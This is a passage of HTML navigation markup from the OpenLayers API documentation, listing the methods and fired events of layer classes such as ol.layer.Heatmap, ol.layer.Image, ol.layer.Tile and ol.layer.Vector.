<a href="ol.layer.Group.html#unset">unset</a>
</li>
</ul>
<ul class="fires itemMembers">
<span class="subtitle">Fires</span>
<li data-name="event:change Triggered when the group/Collection changes." class="unstable">
change Triggered when the group/Collection changes.
</li>
<li data-name="ol.ObjectEvent#event:change:brightness" class="unstable">
change:brightness
</li>
<li data-name="ol.ObjectEvent#event:change:contrast" class="unstable">
change:contrast
</li>
<li data-name="ol.ObjectEvent#event:change:extent" class="unstable">
change:extent
</li>
<li data-name="ol.ObjectEvent#event:change:hue" class="unstable">
change:hue
</li>
<li data-name="ol.ObjectEvent#event:change:layers" class="unstable">
change:layers
</li>
<li data-name="ol.ObjectEvent#event:change:maxResolution" class="unstable">
change:maxResolution
</li>
<li data-name="ol.ObjectEvent#event:change:minResolution" class="unstable">
change:minResolution
</li>
<li data-name="ol.ObjectEvent#event:change:opacity" class="unstable">
change:opacity
</li>
<li data-name="ol.ObjectEvent#event:change:saturation" class="unstable">
change:saturation
</li>
<li data-name="ol.ObjectEvent#event:change:visible" class="unstable">
change:visible
</li>
<li data-name="ol.ObjectEvent#event:propertychange" class="">
<a href="ol.ObjectEvent.html#event:propertychange">propertychange</a>
</li>
</ul>
</li>
<li class="item" data-name="ol.layer.Heatmap">
<span class="title">
<a href="ol.layer.Heatmap.html">ol.layer.Heatmap</a>
</span>
<ul class="members itemMembers">
</ul>
<ul class="typedefs itemMembers">
</ul>
<ul class="methods itemMembers">
<span class="subtitle">Methods</span>
<li data-name="ol.layer.Heatmap#changed" class="unstable">
<a href="ol.layer.Heatmap.html#changed">changed</a>
</li>
<li data-name="ol.layer.Heatmap#get" class="">
<a href="ol.layer.Heatmap.html#get">get</a>
</li>
<li data-name="ol.layer.Heatmap#getBlur" class="unstable">
<a href="ol.layer.Heatmap.html#getBlur">getBlur</a>
</li>
<li data-name="ol.layer.Heatmap#getBrightness" class="unstable">
<a href="ol.layer.Heatmap.html#getBrightness">getBrightness</a>
</li>
<li data-name="ol.layer.Heatmap#getContrast" class="unstable">
<a href="ol.layer.Heatmap.html#getContrast">getContrast</a>
</li>
<li data-name="ol.layer.Heatmap#getExtent" class="">
<a href="ol.layer.Heatmap.html#getExtent">getExtent</a>
</li>
<li data-name="ol.layer.Heatmap#getGradient" class="unstable">
<a href="ol.layer.Heatmap.html#getGradient">getGradient</a>
</li>
<li data-name="ol.layer.Heatmap#getHue" class="unstable">
<a href="ol.layer.Heatmap.html#getHue">getHue</a>
</li>
<li data-name="ol.layer.Heatmap#getKeys" class="">
<a href="ol.layer.Heatmap.html#getKeys">getKeys</a>
</li>
<li data-name="ol.layer.Heatmap#getMaxResolution" class="">
<a href="ol.layer.Heatmap.html#getMaxResolution">getMaxResolution</a>
</li>
<li data-name="ol.layer.Heatmap#getMinResolution" class="">
<a href="ol.layer.Heatmap.html#getMinResolution">getMinResolution</a>
</li>
<li data-name="ol.layer.Heatmap#getOpacity" class="">
<a href="ol.layer.Heatmap.html#getOpacity">getOpacity</a>
</li>
<li data-name="ol.layer.Heatmap#getProperties" class="">
<a href="ol.layer.Heatmap.html#getProperties">getProperties</a>
</li>
<li data-name="ol.layer.Heatmap#getRadius" class="unstable">
<a href="ol.layer.Heatmap.html#getRadius">getRadius</a>
</li>
<li data-name="ol.layer.Heatmap#getRevision" class="unstable">
<a href="ol.layer.Heatmap.html#getRevision">getRevision</a>
</li>
<li data-name="ol.layer.Heatmap#getSaturation" class="unstable">
<a href="ol.layer.Heatmap.html#getSaturation">getSaturation</a>
</li>
<li data-name="ol.layer.Heatmap#getSource" class="">
<a href="ol.layer.Heatmap.html#getSource">getSource</a>
</li>
<li data-name="ol.layer.Heatmap#getStyle" class="">
<a href="ol.layer.Heatmap.html#getStyle">getStyle</a>
</li>
<li data-name="ol.layer.Heatmap#getStyleFunction" class="">
<a href="ol.layer.Heatmap.html#getStyleFunction">getStyleFunction</a>
</li>
<li data-name="ol.layer.Heatmap#getVisible" class="">
<a href="ol.layer.Heatmap.html#getVisible">getVisible</a>
</li>
<li data-name="ol.layer.Heatmap#on" class="">
<a href="ol.layer.Heatmap.html#on">on</a>
</li>
<li data-name="ol.layer.Heatmap#once" class="">
<a href="ol.layer.Heatmap.html#once">once</a>
</li>
<li data-name="ol.layer.Heatmap#set" class="">
<a href="ol.layer.Heatmap.html#set">set</a>
</li>
<li data-name="ol.layer.Heatmap#setBlur" class="unstable">
<a href="ol.layer.Heatmap.html#setBlur">setBlur</a>
</li>
<li data-name="ol.layer.Heatmap#setBrightness" class="unstable">
<a href="ol.layer.Heatmap.html#setBrightness">setBrightness</a>
</li>
<li data-name="ol.layer.Heatmap#setContrast" class="unstable">
<a href="ol.layer.Heatmap.html#setContrast">setContrast</a>
</li>
<li data-name="ol.layer.Heatmap#setExtent" class="">
<a href="ol.layer.Heatmap.html#setExtent">setExtent</a>
</li>
<li data-name="ol.layer.Heatmap#setGradient" class="unstable">
<a href="ol.layer.Heatmap.html#setGradient">setGradient</a>
</li>
<li data-name="ol.layer.Heatmap#setHue" class="unstable">
<a href="ol.layer.Heatmap.html#setHue">setHue</a>
</li>
<li data-name="ol.layer.Heatmap#setMap" class="unstable">
<a href="ol.layer.Heatmap.html#setMap">setMap</a>
</li>
<li data-name="ol.layer.Heatmap#setMaxResolution" class="">
<a href="ol.layer.Heatmap.html#setMaxResolution">setMaxResolution</a>
</li>
<li data-name="ol.layer.Heatmap#setMinResolution" class="">
<a href="ol.layer.Heatmap.html#setMinResolution">setMinResolution</a>
</li>
<li data-name="ol.layer.Heatmap#setOpacity" class="">
<a href="ol.layer.Heatmap.html#setOpacity">setOpacity</a>
</li>
<li data-name="ol.layer.Heatmap#setProperties" class="">
<a href="ol.layer.Heatmap.html#setProperties">setProperties</a>
</li>
<li data-name="ol.layer.Heatmap#setRadius" class="unstable">
<a href="ol.layer.Heatmap.html#setRadius">setRadius</a>
</li>
<li data-name="ol.layer.Heatmap#setSaturation" class="unstable">
<a href="ol.layer.Heatmap.html#setSaturation">setSaturation</a>
</li>
<li data-name="ol.layer.Heatmap#setSource" class="">
<a href="ol.layer.Heatmap.html#setSource">setSource</a>
</li>
<li data-name="ol.layer.Heatmap#setStyle" class="">
<a href="ol.layer.Heatmap.html#setStyle">setStyle</a>
</li>
<li data-name="ol.layer.Heatmap#setVisible" class="">
<a href="ol.layer.Heatmap.html#setVisible">setVisible</a>
</li>
<li data-name="ol.layer.Heatmap#un" class="">
<a href="ol.layer.Heatmap.html#un">un</a>
</li>
<li data-name="ol.layer.Heatmap#unByKey" class="">
<a href="ol.layer.Heatmap.html#unByKey">unByKey</a>
</li>
<li data-name="ol.layer.Heatmap#unset" class="">
<a href="ol.layer.Heatmap.html#unset">unset</a>
</li>
</ul>
<ul class="fires itemMembers">
<span class="subtitle">Fires</span>
<li data-name="event:change Triggered when the state of the source changes." class="unstable">
change Triggered when the state of the source changes.
</li>
<li data-name="ol.ObjectEvent#event:change:blur" class="unstable">
change:blur
</li>
<li data-name="ol.ObjectEvent#event:change:brightness" class="unstable">
change:brightness
</li>
<li data-name="ol.ObjectEvent#event:change:contrast" class="unstable">
change:contrast
</li>
<li data-name="ol.ObjectEvent#event:change:extent" class="unstable">
change:extent
</li>
<li data-name="ol.ObjectEvent#event:change:gradient" class="unstable">
change:gradient
</li>
<li data-name="ol.ObjectEvent#event:change:hue" class="unstable">
change:hue
</li>
<li data-name="ol.ObjectEvent#event:change:maxResolution" class="unstable">
change:maxResolution
</li>
<li data-name="ol.ObjectEvent#event:change:minResolution" class="unstable">
change:minResolution
</li>
<li data-name="ol.ObjectEvent#event:change:opacity" class="unstable">
change:opacity
</li>
<li data-name="ol.ObjectEvent#event:change:radius" class="unstable">
change:radius
</li>
<li data-name="ol.ObjectEvent#event:change:saturation" class="unstable">
change:saturation
</li>
<li data-name="ol.ObjectEvent#event:change:source" class="unstable">
change:source
</li>
<li data-name="ol.ObjectEvent#event:change:visible" class="unstable">
change:visible
</li>
<li data-name="ol.render.Event#event:postcompose" class="unstable">
<a href="ol.render.Event.html#event:postcompose">postcompose</a>
</li>
<li data-name="ol.render.Event#event:precompose" class="unstable">
<a href="ol.render.Event.html#event:precompose">precompose</a>
</li>
<li data-name="ol.ObjectEvent#event:propertychange" class="">
<a href="ol.ObjectEvent.html#event:propertychange">propertychange</a>
</li>
<li data-name="ol.render.Event#event:render" class="unstable">
<a href="ol.render.Event.html#event:render">render</a>
</li>
</ul>
</li>
<li class="item" data-name="ol.layer.Image">
<span class="title">
<a href="ol.layer.Image.html">ol.layer.Image</a>
</span>
<ul class="members itemMembers">
</ul>
<ul class="typedefs itemMembers">
</ul>
<ul class="methods itemMembers">
<span class="subtitle">Methods</span>
<li data-name="ol.layer.Image#changed" class="unstable">
<a href="ol.layer.Image.html#changed">changed</a>
</li>
<li data-name="ol.layer.Image#get" class="">
<a href="ol.layer.Image.html#get">get</a>
</li>
<li data-name="ol.layer.Image#getBrightness" class="unstable">
<a href="ol.layer.Image.html#getBrightness">getBrightness</a>
</li>
<li data-name="ol.layer.Image#getContrast" class="unstable">
<a href="ol.layer.Image.html#getContrast">getContrast</a>
</li>
<li data-name="ol.layer.Image#getExtent" class="">
<a href="ol.layer.Image.html#getExtent">getExtent</a>
</li>
<li data-name="ol.layer.Image#getHue" class="unstable">
<a href="ol.layer.Image.html#getHue">getHue</a>
</li>
<li data-name="ol.layer.Image#getKeys" class="">
<a href="ol.layer.Image.html#getKeys">getKeys</a>
</li>
<li data-name="ol.layer.Image#getMaxResolution" class="">
<a href="ol.layer.Image.html#getMaxResolution">getMaxResolution</a>
</li>
<li data-name="ol.layer.Image#getMinResolution" class="">
<a href="ol.layer.Image.html#getMinResolution">getMinResolution</a>
</li>
<li data-name="ol.layer.Image#getOpacity" class="">
<a href="ol.layer.Image.html#getOpacity">getOpacity</a>
</li>
<li data-name="ol.layer.Image#getProperties" class="">
<a href="ol.layer.Image.html#getProperties">getProperties</a>
</li>
<li data-name="ol.layer.Image#getRevision" class="unstable">
<a href="ol.layer.Image.html#getRevision">getRevision</a>
</li>
<li data-name="ol.layer.Image#getSaturation" class="unstable">
<a href="ol.layer.Image.html#getSaturation">getSaturation</a>
</li>
<li data-name="ol.layer.Image#getSource" class="">
<a href="ol.layer.Image.html#getSource">getSource</a>
</li>
<li data-name="ol.layer.Image#getVisible" class="">
<a href="ol.layer.Image.html#getVisible">getVisible</a>
</li>
<li data-name="ol.layer.Image#on" class="">
<a href="ol.layer.Image.html#on">on</a>
</li>
<li data-name="ol.layer.Image#once" class="">
<a href="ol.layer.Image.html#once">once</a>
</li>
<li data-name="ol.layer.Image#set" class="">
<a href="ol.layer.Image.html#set">set</a>
</li>
<li data-name="ol.layer.Image#setBrightness" class="unstable">
<a href="ol.layer.Image.html#setBrightness">setBrightness</a>
</li>
<li data-name="ol.layer.Image#setContrast" class="unstable">
<a href="ol.layer.Image.html#setContrast">setContrast</a>
</li>
<li data-name="ol.layer.Image#setExtent" class="">
<a href="ol.layer.Image.html#setExtent">setExtent</a>
</li>
<li data-name="ol.layer.Image#setHue" class="unstable">
<a href="ol.layer.Image.html#setHue">setHue</a>
</li>
<li data-name="ol.layer.Image#setMap" class="unstable">
<a href="ol.layer.Image.html#setMap">setMap</a>
</li>
<li data-name="ol.layer.Image#setMaxResolution" class="">
<a href="ol.layer.Image.html#setMaxResolution">setMaxResolution</a>
</li>
<li data-name="ol.layer.Image#setMinResolution" class="">
<a href="ol.layer.Image.html#setMinResolution">setMinResolution</a>
</li>
<li data-name="ol.layer.Image#setOpacity" class="">
<a href="ol.layer.Image.html#setOpacity">setOpacity</a>
</li>
<li data-name="ol.layer.Image#setProperties" class="">
<a href="ol.layer.Image.html#setProperties">setProperties</a>
</li>
<li data-name="ol.layer.Image#setSaturation" class="unstable">
<a href="ol.layer.Image.html#setSaturation">setSaturation</a>
</li>
<li data-name="ol.layer.Image#setSource" class="">
<a href="ol.layer.Image.html#setSource">setSource</a>
</li>
<li data-name="ol.layer.Image#setVisible" class="">
<a href="ol.layer.Image.html#setVisible">setVisible</a>
</li>
<li data-name="ol.layer.Image#un" class="">
<a href="ol.layer.Image.html#un">un</a>
</li>
<li data-name="ol.layer.Image#unByKey" class="">
<a href="ol.layer.Image.html#unByKey">unByKey</a>
</li>
<li data-name="ol.layer.Image#unset" class="">
<a href="ol.layer.Image.html#unset">unset</a>
</li>
</ul>
<ul class="fires itemMembers">
<span class="subtitle">Fires</span>
<li data-name="event:change Triggered when the state of the source changes." class="unstable">
change Triggered when the state of the source changes.
</li>
<li data-name="ol.ObjectEvent#event:change:brightness" class="unstable">
change:brightness
</li>
<li data-name="ol.ObjectEvent#event:change:contrast" class="unstable">
change:contrast
</li>
<li data-name="ol.ObjectEvent#event:change:extent" class="unstable">
change:extent
</li>
<li data-name="ol.ObjectEvent#event:change:hue" class="unstable">
change:hue
</li>
<li data-name="ol.ObjectEvent#event:change:maxResolution" class="unstable">
change:maxResolution
</li>
<li data-name="ol.ObjectEvent#event:change:minResolution" class="unstable">
change:minResolution
</li>
<li data-name="ol.ObjectEvent#event:change:opacity" class="unstable">
change:opacity
</li>
<li data-name="ol.ObjectEvent#event:change:saturation" class="unstable">
change:saturation
</li>
<li data-name="ol.ObjectEvent#event:change:source" class="unstable">
change:source
</li>
<li data-name="ol.ObjectEvent#event:change:visible" class="unstable">
change:visible
</li>
<li data-name="ol.render.Event#event:postcompose" class="unstable">
<a href="ol.render.Event.html#event:postcompose">postcompose</a>
</li>
<li data-name="ol.render.Event#event:precompose" class="unstable">
<a href="ol.render.Event.html#event:precompose">precompose</a>
</li>
<li data-name="ol.ObjectEvent#event:propertychange" class="">
<a href="ol.ObjectEvent.html#event:propertychange">propertychange</a>
</li>
<li data-name="ol.render.Event#event:render" class="unstable">
<a href="ol.render.Event.html#event:render">render</a>
</li>
</ul>
</li>
<li class="item" data-name="ol.layer.Layer">
<span class="title">
<a href="ol.layer.Layer.html">ol.layer.Layer</a>
</span>
<ul class="members itemMembers">
</ul>
<ul class="typedefs itemMembers">
</ul>
<ul class="methods itemMembers">
<span class="subtitle">Methods</span>
<li data-name="ol.layer.Layer#changed" class="unstable">
<a href="ol.layer.Layer.html#changed">changed</a>
</li>
<li data-name="ol.layer.Layer#get" class="">
<a href="ol.layer.Layer.html#get">get</a>
</li>
<li data-name="ol.layer.Layer#getBrightness" class="unstable">
<a href="ol.layer.Layer.html#getBrightness">getBrightness</a>
</li>
<li data-name="ol.layer.Layer#getContrast" class="unstable">
<a href="ol.layer.Layer.html#getContrast">getContrast</a>
</li>
<li data-name="ol.layer.Layer#getExtent" class="">
<a href="ol.layer.Layer.html#getExtent">getExtent</a>
</li>
<li data-name="ol.layer.Layer#getHue" class="unstable">
<a href="ol.layer.Layer.html#getHue">getHue</a>
</li>
<li data-name="ol.layer.Layer#getKeys" class="">
<a href="ol.layer.Layer.html#getKeys">getKeys</a>
</li>
<li data-name="ol.layer.Layer#getMaxResolution" class="">
<a href="ol.layer.Layer.html#getMaxResolution">getMaxResolution</a>
</li>
<li data-name="ol.layer.Layer#getMinResolution" class="">
<a href="ol.layer.Layer.html#getMinResolution">getMinResolution</a>
</li>
<li data-name="ol.layer.Layer#getOpacity" class="">
<a href="ol.layer.Layer.html#getOpacity">getOpacity</a>
</li>
<li data-name="ol.layer.Layer#getProperties" class="">
<a href="ol.layer.Layer.html#getProperties">getProperties</a>
</li>
<li data-name="ol.layer.Layer#getRevision" class="unstable">
<a href="ol.layer.Layer.html#getRevision">getRevision</a>
</li>
<li data-name="ol.layer.Layer#getSaturation" class="unstable">
<a href="ol.layer.Layer.html#getSaturation">getSaturation</a>
</li>
<li data-name="ol.layer.Layer#getSource" class="">
<a href="ol.layer.Layer.html#getSource">getSource</a>
</li>
<li data-name="ol.layer.Layer#getVisible" class="">
<a href="ol.layer.Layer.html#getVisible">getVisible</a>
</li>
<li data-name="ol.layer.Layer#on" class="">
<a href="ol.layer.Layer.html#on">on</a>
</li>
<li data-name="ol.layer.Layer#once" class="">
<a href="ol.layer.Layer.html#once">once</a>
</li>
<li data-name="ol.layer.Layer#set" class="">
<a href="ol.layer.Layer.html#set">set</a>
</li>
<li data-name="ol.layer.Layer#setBrightness" class="unstable">
<a href="ol.layer.Layer.html#setBrightness">setBrightness</a>
</li>
<li data-name="ol.layer.Layer#setContrast" class="unstable">
<a href="ol.layer.Layer.html#setContrast">setContrast</a>
</li>
<li data-name="ol.layer.Layer#setExtent" class="">
<a href="ol.layer.Layer.html#setExtent">setExtent</a>
</li>
<li data-name="ol.layer.Layer#setHue" class="unstable">
<a href="ol.layer.Layer.html#setHue">setHue</a>
</li>
<li data-name="ol.layer.Layer#setMap" class="unstable">
<a href="ol.layer.Layer.html#setMap">setMap</a>
</li>
<li data-name="ol.layer.Layer#setMaxResolution" class="">
<a href="ol.layer.Layer.html#setMaxResolution">setMaxResolution</a>
</li>
<li data-name="ol.layer.Layer#setMinResolution" class="">
<a href="ol.layer.Layer.html#setMinResolution">setMinResolution</a>
</li>
<li data-name="ol.layer.Layer#setOpacity" class="">
<a href="ol.layer.Layer.html#setOpacity">setOpacity</a>
</li>
<li data-name="ol.layer.Layer#setProperties" class="">
<a href="ol.layer.Layer.html#setProperties">setProperties</a>
</li>
<li data-name="ol.layer.Layer#setSaturation" class="unstable">
<a href="ol.layer.Layer.html#setSaturation">setSaturation</a>
</li>
<li data-name="ol.layer.Layer#setSource" class="">
<a href="ol.layer.Layer.html#setSource">setSource</a>
</li>
<li data-name="ol.layer.Layer#setVisible" class="">
<a href="ol.layer.Layer.html#setVisible">setVisible</a>
</li>
<li data-name="ol.layer.Layer#un" class="">
<a href="ol.layer.Layer.html#un">un</a>
</li>
<li data-name="ol.layer.Layer#unByKey" class="">
<a href="ol.layer.Layer.html#unByKey">unByKey</a>
</li>
<li data-name="ol.layer.Layer#unset" class="">
<a href="ol.layer.Layer.html#unset">unset</a>
</li>
</ul>
<ul class="fires itemMembers">
<span class="subtitle">Fires</span>
<li data-name="event:change Triggered when the state of the source changes." class="unstable">
change Triggered when the state of the source changes.
</li>
<li data-name="ol.ObjectEvent#event:change:brightness" class="unstable">
change:brightness
</li>
<li data-name="ol.ObjectEvent#event:change:contrast" class="unstable">
change:contrast
</li>
<li data-name="ol.ObjectEvent#event:change:extent" class="unstable">
change:extent
</li>
<li data-name="ol.ObjectEvent#event:change:hue" class="unstable">
change:hue
</li>
<li data-name="ol.ObjectEvent#event:change:maxResolution" class="unstable">
change:maxResolution
</li>
<li data-name="ol.ObjectEvent#event:change:minResolution" class="unstable">
change:minResolution
</li>
<li data-name="ol.ObjectEvent#event:change:opacity" class="unstable">
change:opacity
</li>
<li data-name="ol.ObjectEvent#event:change:saturation" class="unstable">
change:saturation
</li>
<li data-name="ol.ObjectEvent#event:change:source" class="unstable">
change:source
</li>
<li data-name="ol.ObjectEvent#event:change:visible" class="unstable">
change:visible
</li>
<li data-name="ol.render.Event#event:postcompose" class="unstable">
<a href="ol.render.Event.html#event:postcompose">postcompose</a>
</li>
<li data-name="ol.render.Event#event:precompose" class="unstable">
<a href="ol.render.Event.html#event:precompose">precompose</a>
</li>
<li data-name="ol.ObjectEvent#event:propertychange" class="">
<a href="ol.ObjectEvent.html#event:propertychange">propertychange</a>
</li>
<li data-name="ol.render.Event#event:render" class="unstable">
<a href="ol.render.Event.html#event:render">render</a>
</li>
</ul>
</li>
<li class="item" data-name="ol.layer.Tile">
<span class="title">
<a href="ol.layer.Tile.html">ol.layer.Tile</a>
</span>
<ul class="members itemMembers">
</ul>
<ul class="typedefs itemMembers">
</ul>
<ul class="methods itemMembers">
<span class="subtitle">Methods</span>
<li data-name="ol.layer.Tile#changed" class="unstable">
<a href="ol.layer.Tile.html#changed">changed</a>
</li>
<li data-name="ol.layer.Tile#get" class="">
<a href="ol.layer.Tile.html#get">get</a>
</li>
<li data-name="ol.layer.Tile#getBrightness" class="unstable">
<a href="ol.layer.Tile.html#getBrightness">getBrightness</a>
</li>
<li data-name="ol.layer.Tile#getContrast" class="unstable">
<a href="ol.layer.Tile.html#getContrast">getContrast</a>
</li>
<li data-name="ol.layer.Tile#getExtent" class="">
<a href="ol.layer.Tile.html#getExtent">getExtent</a>
</li>
<li data-name="ol.layer.Tile#getHue" class="unstable">
<a href="ol.layer.Tile.html#getHue">getHue</a>
</li>
<li data-name="ol.layer.Tile#getKeys" class="">
<a href="ol.layer.Tile.html#getKeys">getKeys</a>
</li>
<li data-name="ol.layer.Tile#getMaxResolution" class="">
<a href="ol.layer.Tile.html#getMaxResolution">getMaxResolution</a>
</li>
<li data-name="ol.layer.Tile#getMinResolution" class="">
<a href="ol.layer.Tile.html#getMinResolution">getMinResolution</a>
</li>
<li data-name="ol.layer.Tile#getOpacity" class="">
<a href="ol.layer.Tile.html#getOpacity">getOpacity</a>
</li>
<li data-name="ol.layer.Tile#getPreload" class="unstable">
<a href="ol.layer.Tile.html#getPreload">getPreload</a>
</li>
<li data-name="ol.layer.Tile#getProperties" class="">
<a href="ol.layer.Tile.html#getProperties">getProperties</a>
</li>
<li data-name="ol.layer.Tile#getRevision" class="unstable">
<a href="ol.layer.Tile.html#getRevision">getRevision</a>
</li>
<li data-name="ol.layer.Tile#getSaturation" class="unstable">
<a href="ol.layer.Tile.html#getSaturation">getSaturation</a>
</li>
<li data-name="ol.layer.Tile#getSource" class="">
<a href="ol.layer.Tile.html#getSource">getSource</a>
</li>
<li data-name="ol.layer.Tile#getUseInterimTilesOnError" class="unstable">
<a href="ol.layer.Tile.html#getUseInterimTilesOnError">getUseInterimTilesOnError</a>
</li>
<li data-name="ol.layer.Tile#getVisible" class="">
<a href="ol.layer.Tile.html#getVisible">getVisible</a>
</li>
<li data-name="ol.layer.Tile#on" class="">
<a href="ol.layer.Tile.html#on">on</a>
</li>
<li data-name="ol.layer.Tile#once" class="">
<a href="ol.layer.Tile.html#once">once</a>
</li>
<li data-name="ol.layer.Tile#set" class="">
<a href="ol.layer.Tile.html#set">set</a>
</li>
<li data-name="ol.layer.Tile#setBrightness" class="unstable">
<a href="ol.layer.Tile.html#setBrightness">setBrightness</a>
</li>
<li data-name="ol.layer.Tile#setContrast" class="unstable">
<a href="ol.layer.Tile.html#setContrast">setContrast</a>
</li>
<li data-name="ol.layer.Tile#setExtent" class="">
<a href="ol.layer.Tile.html#setExtent">setExtent</a>
</li>
<li data-name="ol.layer.Tile#setHue" class="unstable">
<a href="ol.layer.Tile.html#setHue">setHue</a>
</li>
<li data-name="ol.layer.Tile#setMap" class="unstable">
<a href="ol.layer.Tile.html#setMap">setMap</a>
</li>
<li data-name="ol.layer.Tile#setMaxResolution" class="">
<a href="ol.layer.Tile.html#setMaxResolution">setMaxResolution</a>
</li>
<li data-name="ol.layer.Tile#setMinResolution" class="">
<a href="ol.layer.Tile.html#setMinResolution">setMinResolution</a>
</li>
<li data-name="ol.layer.Tile#setOpacity" class="">
<a href="ol.layer.Tile.html#setOpacity">setOpacity</a>
</li>
<li data-name="ol.layer.Tile#setPreload" class="unstable">
<a href="ol.layer.Tile.html#setPreload">setPreload</a>
</li>
<li data-name="ol.layer.Tile#setProperties" class="">
<a href="ol.layer.Tile.html#setProperties">setProperties</a>
</li>
<li data-name="ol.layer.Tile#setSaturation" class="unstable">
<a href="ol.layer.Tile.html#setSaturation">setSaturation</a>
</li>
<li data-name="ol.layer.Tile#setSource" class="">
<a href="ol.layer.Tile.html#setSource">setSource</a>
</li>
<li data-name="ol.layer.Tile#setUseInterimTilesOnError" class="unstable">
<a href="ol.layer.Tile.html#setUseInterimTilesOnError">setUseInterimTilesOnError</a>
</li>
<li data-name="ol.layer.Tile#setVisible" class="">
<a href="ol.layer.Tile.html#setVisible">setVisible</a>
</li>
<li data-name="ol.layer.Tile#un" class="">
<a href="ol.layer.Tile.html#un">un</a>
</li>
<li data-name="ol.layer.Tile#unByKey" class="">
<a href="ol.layer.Tile.html#unByKey">unByKey</a>
</li>
<li data-name="ol.layer.Tile#unset" class="">
<a href="ol.layer.Tile.html#unset">unset</a>
</li>
</ul>
<ul class="fires itemMembers">
<span class="subtitle">Fires</span>
<li data-name="event:change Triggered when the state of the source changes." class="unstable">
change Triggered when the state of the source changes.
</li>
<li data-name="ol.ObjectEvent#event:change:brightness" class="unstable">
change:brightness
</li>
<li data-name="ol.ObjectEvent#event:change:contrast" class="unstable">
change:contrast
</li>
<li data-name="ol.ObjectEvent#event:change:extent" class="unstable">
change:extent
</li>
<li data-name="ol.ObjectEvent#event:change:hue" class="unstable">
change:hue
</li>
<li data-name="ol.ObjectEvent#event:change:maxResolution" class="unstable">
change:maxResolution
</li>
<li data-name="ol.ObjectEvent#event:change:minResolution" class="unstable">
change:minResolution
</li>
<li data-name="ol.ObjectEvent#event:change:opacity" class="unstable">
change:opacity
</li>
<li data-name="ol.ObjectEvent#event:change:preload" class="unstable">
change:preload
</li>
<li data-name="ol.ObjectEvent#event:change:saturation" class="unstable">
change:saturation
</li>
<li data-name="ol.ObjectEvent#event:change:source" class="unstable">
change:source
</li>
<li data-name="ol.ObjectEvent#event:change:useInterimTilesOnError" class="unstable">
change:useInterimTilesOnError
</li>
<li data-name="ol.ObjectEvent#event:change:visible" class="unstable">
change:visible
</li>
<li data-name="ol.render.Event#event:postcompose" class="unstable">
<a href="ol.render.Event.html#event:postcompose">postcompose</a>
</li>
<li data-name="ol.render.Event#event:precompose" class="unstable">
<a href="ol.render.Event.html#event:precompose">precompose</a>
</li>
<li data-name="ol.ObjectEvent#event:propertychange" class="">
<a href="ol.ObjectEvent.html#event:propertychange">propertychange</a>
</li>
<li data-name="ol.render.Event#event:render" class="unstable">
<a href="ol.render.Event.html#event:render">render</a>
</li>
</ul>
</li>
<li class="item" data-name="ol.layer.Vector">
<span class="title">
<a href="ol.layer.Vector.html">ol.layer.Vector</a>
</span>
<ul class="members itemMembers">
</ul>
<ul class="typedefs itemMembers">
</ul>
<ul class="methods itemMembers">
<span class="subtitle">Methods</span>
<li data-name="ol.layer.Vector#changed" class="unstable">
<a href="ol.layer.Vector.html#changed">changed</a>
</li>
<li data-name="ol.layer.Vector#get" class="">
<a href="ol.layer.Vector.html#get">get</a>
</li>
<li data-name="ol.layer.Vector#getBrightness" class="unstable">
<a href="ol.layer.Vector.html#getBrightness">getBrightness</a>
</li>
<li data-name="ol.layer.Vector#getContrast" class="unstable">
<a href="ol.layer.Vector.html#getContrast">getContrast</a>
</li>
<li data-name="ol.layer.Vector#getExtent" class="">
<a href="ol.layer.Vector.html#getExtent">getExtent</a>
</li>
<li data-name="ol.layer.Vector#getHue" class="unstable">
<a href="ol.layer.Vector.html#getHue">getHue</a>
</li>
<li data-name="ol.layer.Vector#getKeys" class="">
<a href="ol.layer.Vector.html#getKeys">getKeys</a>
</li>
<li data-name="ol.layer.Vector#getMaxResolution" class="">
<a href="ol.layer.Vector.html#getMaxResolution">getMaxResolution</a>
</li>
<li data-name="ol.layer.Vector#getMinResolution" class="">
<a href="ol.layer.Vector.html#getMinResolution">getMinResolution</a>
</li>
<li data-name="ol.layer.Vector#getOpacity" class="">
<a href="ol.layer.Vector.html#getOpacity">getOpacity</a>
</li>
<li data-name="ol.layer.Vector#getProperties" class="">
<a href="ol.layer.Vector.html#getProperties">getProperties</a>
</li>
<li data-name="ol.layer.Vector#getRevision" class="unstable">
<a href="ol.layer.Vector.html#getRevision">getRevision</a>
</li>
<li data-name="ol.layer.Vector#getSaturation" class="unstable">
<a href="ol.layer.Vector.html#getSaturation">getSaturation</a>
</li>
<li data-name="ol.layer.Vector#getSource" class="">
<a href="ol.layer.Vector.html#getSource">getSource</a>
</li>
<li data-name="ol.layer.Vector#getStyle" class="">
<a href="ol.layer.Vector.html#getStyle">getStyle</a>
</li>
<li data-name="ol.layer.Vector#getStyleFunction" class="">
<a href="ol.layer.Vector.html#getStyleFunction">getStyleFunction</a>
</li>
<li data-name="ol.layer.Vector#getVisible" class="">
<a href="ol.layer.Vector.html#getVisible">getVisible</a>
</li>
<li data-name="ol.layer.Vector#on" class="">
<a href="ol.layer.Vector.html#on">on</a>
</li>
<li data-name="ol.layer.Vector#once" class="">
<a href="ol.layer.Vector.html#once">once</a>
</li>
<li data-name="ol.layer.Vector#set" class="">
<a href="ol.layer.Vector.html#set">set</a>
</li>
<li data-name="ol.layer.Vector#setBrightness" class="unstable">
<a href="ol.layer.Vector.html#setBrightness">setBrightness</a>
</li>
<li data-name="ol.layer.Vector#setContrast" class="unstable">
<a href="ol.layer.Vector.html#setContrast">setContrast</a>
</li>
<li data-name="ol.layer.Vector#setExtent" class="">
<a href="ol.layer.Vector.html#setExtent">setExtent</a>
</li>
<li data-name="ol.layer.Vector#setHue" class="unstable">
<a href="ol.layer.Vector.html#setHue">setHue</a>
</li>
<li data-name="ol.layer.Vector#setMap" class="unstable">
<a href="ol.layer.Vector.html#setMap">setMap</a>
</li>
<li data-name="ol.layer.Vector#setMaxResolution" class="">
<a href="ol.layer.Vector.html#setMaxResolution">setMaxResolution</a>
</li>
<li data-name="ol.layer.Vector#setMinResolution" class="">
<a href="ol.layer.Vector.html#setMinResolution">setMinResolution</a>
</li>
<li data-name="ol.layer.Vector#setOpacity" class="">
<a href="ol.layer.Vector.html#setOpacity">setOpacity</a>
</li>
<li data-name="ol.layer.Vector#setProperties" class="">
<a href="ol.layer.Vector.html#setProperties">setProperties</a>
</li>
<li data-name="ol.layer.Vector#setSaturation" class="unstable">
<a href="ol.layer.Vector.html#setSaturation">setSaturation</a>
</li>
<li data-name="ol.layer.Vector#setSource" class="">
<a href="ol.layer.Vector.html#setSource">setSource</a>
</li>
<li data-name="ol.layer.Vector#setStyle" class="">
<a href="ol.layer.Vector.html#setStyle">setStyle</a>
</li>
<li data-name="ol.layer.Vector#setVisible" class="">
